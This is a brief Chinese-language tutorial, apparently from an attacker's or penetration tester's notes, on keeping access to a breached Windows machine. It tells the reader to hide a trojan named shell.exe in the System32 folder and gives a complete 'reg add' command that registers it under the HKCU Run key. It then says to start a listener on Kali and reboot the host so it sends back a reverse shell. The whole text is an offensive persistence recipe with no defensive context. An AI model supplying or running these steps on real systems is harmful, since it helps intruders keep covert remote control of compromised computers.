注册表就是个数据库,在服务或者系统启动时,会运行注册表相关程序,利用此特性可以进行权限维持。假设拿到shell高权限
1、首先需要将生成的木马文件放入C:\Windows\System32\ 目录下,因为里面主要存储一些系统程序
2、reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "test2" /t REG_SZ /d "C:\Windows\System32\shell.exe" /f reg add将新的子项或项添加到注册表中;v表示注册子项名称;t表示类型—REG_SZ为简单文本字符串,可用于文件、路径等;d表示子项值
3、kali开启监听
4、重启失陷主机,成功反弹shell